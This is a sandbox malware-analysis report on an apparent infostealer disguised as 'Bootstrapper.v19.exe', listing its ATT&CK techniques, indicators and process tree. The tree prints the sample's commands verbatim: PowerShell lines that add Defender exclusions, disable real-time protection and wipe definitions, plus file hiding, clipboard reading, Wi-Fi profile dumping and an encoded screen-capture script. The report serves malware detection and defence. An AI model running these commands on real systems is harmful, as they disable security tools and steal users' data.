58f4f387a6a5b9a3befdb5607c669e3169edef5408a81fd1dddb38596f3544ba

Analysis

max time kernel
107s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240802-it
resource tags

arch:x64arch:x86image:win10v2004-20240802-itlocale:it-itos:windows10-2004-x64systemwindows
submitted
06-10-2024 00:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Bootstrapper.v19.exe
Size

12.0MB
MD5

624cecbd5312f45f6f9ad90e8cda5762
SHA1

fb141ac8f4e4a071ea97876e6225f9dd1ae8e96c
SHA256

58f4f387a6a5b9a3befdb5607c669e3169edef5408a81fd1dddb38596f3544ba
SHA512

a97a471b09aa8834ca657f5f88ce2e6bec6aae28ed8b4e5e6460582a647ba82efa6a1edc94bb80c9206bf95258cad57b21829afa7f386834759c08642821c2d2
SSDEEP

98304:8iSi8x9XQskurErvz81LpWjjUa50ZtPvYRt2e4GFNGjfzfbIbApJo4EJKhOC1124:8lP9VkurErvI9pWjgfPvzm6gsFEg4A3

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3200	powershell.exe
4196	powershell.exe
2316	powershell.exe
4812	powershell.exe
3564	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Bootstrapper.v19.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1064	cmd.exe
3224	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4548	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe
4824	Bootstrapper.v19.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	discord.com
22	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3512	tasklist.exe
2136	tasklist.exe
2432	tasklist.exe
4516	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3044	cmd.exe

UPX packed file 58 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023416-21.dat	upx
behavioral2/memory/4824-25-0x00007FFCA8C90000-0x00007FFCA9282000-memory.dmp	upx
behavioral2/files/0x0007000000023409-27.dat	upx
behavioral2/files/0x0007000000023414-31.dat	upx
behavioral2/files/0x0007000000023413-34.dat	upx
behavioral2/files/0x0007000000023410-48.dat	upx
behavioral2/files/0x000700000002340f-47.dat	upx
behavioral2/files/0x000700000002340e-46.dat	upx
behavioral2/files/0x000700000002340d-45.dat	upx
behavioral2/files/0x000700000002340c-44.dat	upx
behavioral2/files/0x000700000002340b-43.dat	upx
behavioral2/files/0x000700000002340a-42.dat	upx
behavioral2/files/0x0008000000023408-41.dat	upx
behavioral2/files/0x000700000002341b-40.dat	upx
behavioral2/files/0x000700000002341a-39.dat	upx
behavioral2/files/0x0007000000023419-38.dat	upx
behavioral2/files/0x0007000000023415-35.dat	upx
behavioral2/memory/4824-32-0x00007FFCBFDD0000-0x00007FFCBFDDF000-memory.dmp	upx
behavioral2/memory/4824-30-0x00007FFCBDF70000-0x00007FFCBDF94000-memory.dmp	upx
behavioral2/memory/4824-55-0x00007FFCB8910000-0x00007FFCB893D000-memory.dmp	upx
behavioral2/memory/4824-56-0x00007FFCB8770000-0x00007FFCB8789000-memory.dmp	upx
behavioral2/memory/4824-58-0x00007FFCB8640000-0x00007FFCB8663000-memory.dmp	upx
behavioral2/memory/4824-60-0x00007FFCB7CD0000-0x00007FFCB7E4E000-memory.dmp	upx
behavioral2/memory/4824-62-0x00007FFCB82A0000-0x00007FFCB82B9000-memory.dmp	upx
behavioral2/memory/4824-64-0x00007FFCB8290000-0x00007FFCB829D000-memory.dmp	upx
behavioral2/memory/4824-66-0x00007FFCB8A00000-0x00007FFCB8A33000-memory.dmp	upx
behavioral2/memory/4824-74-0x00007FFCBDF70000-0x00007FFCBDF94000-memory.dmp	upx
behavioral2/memory/4824-72-0x00007FFCA81A0000-0x00007FFCA86C9000-memory.dmp	upx
behavioral2/memory/4824-71-0x00007FFCB7F70000-0x00007FFCB803D000-memory.dmp	upx
behavioral2/memory/4824-70-0x00007FFCA8C90000-0x00007FFCA9282000-memory.dmp	upx
behavioral2/memory/4824-76-0x00007FFCBDED0000-0x00007FFCBDEE4000-memory.dmp	upx
behavioral2/memory/4824-78-0x00007FFCB89F0000-0x00007FFCB89FD000-memory.dmp	upx
behavioral2/memory/4824-83-0x00007FFCB7E50000-0x00007FFCB7F6C000-memory.dmp	upx
behavioral2/memory/4824-159-0x00007FFCB8640000-0x00007FFCB8663000-memory.dmp	upx
behavioral2/memory/4824-186-0x00007FFCB7CD0000-0x00007FFCB7E4E000-memory.dmp	upx
behavioral2/memory/4824-216-0x00007FFCB82A0000-0x00007FFCB82B9000-memory.dmp	upx
behavioral2/memory/4824-268-0x00007FFCB8290000-0x00007FFCB829D000-memory.dmp	upx
behavioral2/memory/4824-288-0x00007FFCB8A00000-0x00007FFCB8A33000-memory.dmp	upx
behavioral2/memory/4824-296-0x00007FFCB7F70000-0x00007FFCB803D000-memory.dmp	upx
behavioral2/memory/4824-297-0x00007FFCA81A0000-0x00007FFCA86C9000-memory.dmp	upx
behavioral2/memory/4824-309-0x00007FFCA8C90000-0x00007FFCA9282000-memory.dmp	upx
behavioral2/memory/4824-315-0x00007FFCB7CD0000-0x00007FFCB7E4E000-memory.dmp	upx
behavioral2/memory/4824-310-0x00007FFCBDF70000-0x00007FFCBDF94000-memory.dmp	upx
behavioral2/memory/4824-345-0x00007FFCA81A0000-0x00007FFCA86C9000-memory.dmp	upx
behavioral2/memory/4824-359-0x00007FFCB7F70000-0x00007FFCB803D000-memory.dmp	upx
behavioral2/memory/4824-358-0x00007FFCB8A00000-0x00007FFCB8A33000-memory.dmp	upx
behavioral2/memory/4824-357-0x00007FFCB8290000-0x00007FFCB829D000-memory.dmp	upx
behavioral2/memory/4824-356-0x00007FFCB82A0000-0x00007FFCB82B9000-memory.dmp	upx
behavioral2/memory/4824-355-0x00007FFCB7CD0000-0x00007FFCB7E4E000-memory.dmp	upx
behavioral2/memory/4824-354-0x00007FFCB8640000-0x00007FFCB8663000-memory.dmp	upx
behavioral2/memory/4824-353-0x00007FFCB8770000-0x00007FFCB8789000-memory.dmp	upx
behavioral2/memory/4824-352-0x00007FFCB8910000-0x00007FFCB893D000-memory.dmp	upx
behavioral2/memory/4824-351-0x00007FFCBFDD0000-0x00007FFCBFDDF000-memory.dmp	upx
behavioral2/memory/4824-350-0x00007FFCBDF70000-0x00007FFCBDF94000-memory.dmp	upx
behavioral2/memory/4824-348-0x00007FFCB7E50000-0x00007FFCB7F6C000-memory.dmp	upx
behavioral2/memory/4824-347-0x00007FFCB89F0000-0x00007FFCB89FD000-memory.dmp	upx
behavioral2/memory/4824-346-0x00007FFCBDED0000-0x00007FFCBDEE4000-memory.dmp	upx
behavioral2/memory/4824-334-0x00007FFCA8C90000-0x00007FFCA9282000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3876	cmd.exe
2616	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1264	cmd.exe
1744	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3648	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1188	systeminfo.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings	OpenWith.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2616	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
3564	powershell.exe
3564	powershell.exe
2316	powershell.exe
2316	powershell.exe
4812	powershell.exe
4812	powershell.exe
3224	powershell.exe
3224	powershell.exe
4812	powershell.exe
3452	powershell.exe
3452	powershell.exe
3564	powershell.exe
3564	powershell.exe
3224	powershell.exe
2316	powershell.exe
3452	powershell.exe
3200	powershell.exe
3200	powershell.exe
4052	powershell.exe
4052	powershell.exe
4196	powershell.exe
4196	powershell.exe
4756	powershell.exe
4756	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2136	tasklist.exe
Token: SeDebugPrivilege	2432	tasklist.exe
Token: SeDebugPrivilege	3564	powershell.exe
Token: SeIncreaseQuotaPrivilege	2188	WMIC.exe
Token: SeSecurityPrivilege	2188	WMIC.exe
Token: SeTakeOwnershipPrivilege	2188	WMIC.exe
Token: SeLoadDriverPrivilege	2188	WMIC.exe
Token: SeSystemProfilePrivilege	2188	WMIC.exe
Token: SeSystemtimePrivilege	2188	WMIC.exe
Token: SeProfSingleProcessPrivilege	2188	WMIC.exe
Token: SeIncBasePriorityPrivilege	2188	WMIC.exe
Token: SeCreatePagefilePrivilege	2188	WMIC.exe
Token: SeBackupPrivilege	2188	WMIC.exe
Token: SeRestorePrivilege	2188	WMIC.exe
Token: SeShutdownPrivilege	2188	WMIC.exe
Token: SeDebugPrivilege	2188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2188	WMIC.exe
Token: SeRemoteShutdownPrivilege	2188	WMIC.exe
Token: SeUndockPrivilege	2188	WMIC.exe
Token: SeManageVolumePrivilege	2188	WMIC.exe
Token: 33	2188	WMIC.exe
Token: 34	2188	WMIC.exe
Token: 35	2188	WMIC.exe
Token: 36	2188	WMIC.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	4516	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2188	WMIC.exe
Token: SeSecurityPrivilege	2188	WMIC.exe
Token: SeTakeOwnershipPrivilege	2188	WMIC.exe
Token: SeLoadDriverPrivilege	2188	WMIC.exe
Token: SeSystemProfilePrivilege	2188	WMIC.exe
Token: SeSystemtimePrivilege	2188	WMIC.exe
Token: SeProfSingleProcessPrivilege	2188	WMIC.exe
Token: SeIncBasePriorityPrivilege	2188	WMIC.exe
Token: SeCreatePagefilePrivilege	2188	WMIC.exe
Token: SeBackupPrivilege	2188	WMIC.exe
Token: SeRestorePrivilege	2188	WMIC.exe
Token: SeShutdownPrivilege	2188	WMIC.exe
Token: SeDebugPrivilege	2188	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2188	WMIC.exe
Token: SeRemoteShutdownPrivilege	2188	WMIC.exe
Token: SeUndockPrivilege	2188	WMIC.exe
Token: SeManageVolumePrivilege	2188	WMIC.exe
Token: 33	2188	WMIC.exe
Token: 34	2188	WMIC.exe
Token: 35	2188	WMIC.exe
Token: 36	2188	WMIC.exe
Token: SeDebugPrivilege	3452	powershell.exe
Token: SeDebugPrivilege	3512	tasklist.exe
Token: SeDebugPrivilege	3200	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeIncreaseQuotaPrivilege	2508	WMIC.exe
Token: SeSecurityPrivilege	2508	WMIC.exe
Token: SeTakeOwnershipPrivilege	2508	WMIC.exe
Token: SeLoadDriverPrivilege	2508	WMIC.exe
Token: SeSystemProfilePrivilege	2508	WMIC.exe
Token: SeSystemtimePrivilege	2508	WMIC.exe
Token: SeProfSingleProcessPrivilege	2508	WMIC.exe
Token: SeIncBasePriorityPrivilege	2508	WMIC.exe
Token: SeCreatePagefilePrivilege	2508	WMIC.exe
Token: SeBackupPrivilege	2508	WMIC.exe
Token: SeRestorePrivilege	2508	WMIC.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
4532	OpenWith.exe
4532	OpenWith.exe
4532	OpenWith.exe
4532	OpenWith.exe
4532	OpenWith.exe
4532	OpenWith.exe
4532	OpenWith.exe
4532	OpenWith.exe
4532	OpenWith.exe
1752	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3680 wrote to memory of 4824	3680	Bootstrapper.v19.exe	82
PID 3680 wrote to memory of 4824	3680	Bootstrapper.v19.exe	82
PID 4824 wrote to memory of 120	4824	Bootstrapper.v19.exe	84
PID 4824 wrote to memory of 120	4824	Bootstrapper.v19.exe	84
PID 4824 wrote to memory of 4196	4824	Bootstrapper.v19.exe	85
PID 4824 wrote to memory of 4196	4824	Bootstrapper.v19.exe	85
PID 4824 wrote to memory of 3044	4824	Bootstrapper.v19.exe	86
PID 4824 wrote to memory of 3044	4824	Bootstrapper.v19.exe	86
PID 4824 wrote to memory of 5000	4824	Bootstrapper.v19.exe	88
PID 4824 wrote to memory of 5000	4824	Bootstrapper.v19.exe	88
PID 4824 wrote to memory of 980	4824	Bootstrapper.v19.exe	92
PID 4824 wrote to memory of 980	4824	Bootstrapper.v19.exe	92
PID 4824 wrote to memory of 4324	4824	Bootstrapper.v19.exe	93
PID 4824 wrote to memory of 4324	4824	Bootstrapper.v19.exe	93
PID 980 wrote to memory of 2136	980	cmd.exe	96
PID 980 wrote to memory of 2136	980	cmd.exe	96
PID 4324 wrote to memory of 2432	4324	cmd.exe	97
PID 4324 wrote to memory of 2432	4324	cmd.exe	97
PID 3044 wrote to memory of 3064	3044	cmd.exe	98
PID 3044 wrote to memory of 3064	3044	cmd.exe	98
PID 4824 wrote to memory of 4944	4824	Bootstrapper.v19.exe	149
PID 4824 wrote to memory of 4944	4824	Bootstrapper.v19.exe	149
PID 5000 wrote to memory of 4812	5000	cmd.exe	155
PID 5000 wrote to memory of 4812	5000	cmd.exe	155
PID 4824 wrote to memory of 1064	4824	Bootstrapper.v19.exe	101
PID 4824 wrote to memory of 1064	4824	Bootstrapper.v19.exe	101
PID 4824 wrote to memory of 4464	4824	Bootstrapper.v19.exe	104
PID 4824 wrote to memory of 4464	4824	Bootstrapper.v19.exe	104
PID 120 wrote to memory of 3564	120	cmd.exe	107
PID 120 wrote to memory of 3564	120	cmd.exe	107
PID 4196 wrote to memory of 2316	4196	cmd.exe	108
PID 4196 wrote to memory of 2316	4196	cmd.exe	108
PID 4824 wrote to memory of 2888	4824	Bootstrapper.v19.exe	109
PID 4824 wrote to memory of 2888	4824	Bootstrapper.v19.exe	109
PID 4824 wrote to memory of 1264	4824	Bootstrapper.v19.exe	111
PID 4824 wrote to memory of 1264	4824	Bootstrapper.v19.exe	111
PID 4824 wrote to memory of 4608	4824	Bootstrapper.v19.exe	112
PID 4824 wrote to memory of 4608	4824	Bootstrapper.v19.exe	112
PID 4824 wrote to memory of 2824	4824	Bootstrapper.v19.exe	114
PID 4824 wrote to memory of 2824	4824	Bootstrapper.v19.exe	114
PID 1064 wrote to memory of 3224	1064	cmd.exe	115
PID 1064 wrote to memory of 3224	1064	cmd.exe	115
PID 4824 wrote to memory of 4920	4824	Bootstrapper.v19.exe	116
PID 4824 wrote to memory of 4920	4824	Bootstrapper.v19.exe	116
PID 4944 wrote to memory of 2188	4944	cmd.exe	120
PID 4944 wrote to memory of 2188	4944	cmd.exe	120
PID 4464 wrote to memory of 4516	4464	cmd.exe	121
PID 4464 wrote to memory of 4516	4464	cmd.exe	121
PID 2888 wrote to memory of 5008	2888	cmd.exe	122
PID 2888 wrote to memory of 5008	2888	cmd.exe	122
PID 2824 wrote to memory of 3688	2824	cmd.exe	143
PID 2824 wrote to memory of 3688	2824	cmd.exe	143
PID 4920 wrote to memory of 3452	4920	cmd.exe	124
PID 4920 wrote to memory of 3452	4920	cmd.exe	124
PID 1264 wrote to memory of 1744	1264	cmd.exe	125
PID 1264 wrote to memory of 1744	1264	cmd.exe	125
PID 4608 wrote to memory of 1188	4608	cmd.exe	126
PID 4608 wrote to memory of 1188	4608	cmd.exe	126
PID 4824 wrote to memory of 3216	4824	Bootstrapper.v19.exe	127
PID 4824 wrote to memory of 3216	4824	Bootstrapper.v19.exe	127
PID 4824 wrote to memory of 3412	4824	Bootstrapper.v19.exe	128
PID 4824 wrote to memory of 3412	4824	Bootstrapper.v19.exe	128
PID 3412 wrote to memory of 60	3412	cmd.exe	131
PID 3412 wrote to memory of 60	3412	cmd.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3064	attrib.exe
4004	attrib.exe
4640	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Bootstrapper.v19.exe
"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.v19.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3680
- C:\Users\Admin\AppData\Local\Temp\Bootstrapper.v19.exe
  "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.v19.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bootstrapper.v19.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Bootstrapper.v19.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.v19.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3044
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.v19.exe"
      4⤵
      Views/modifies file attributes
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ ‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:980
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4324
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4944
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4464
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2888
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1264
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4608
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2824
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAg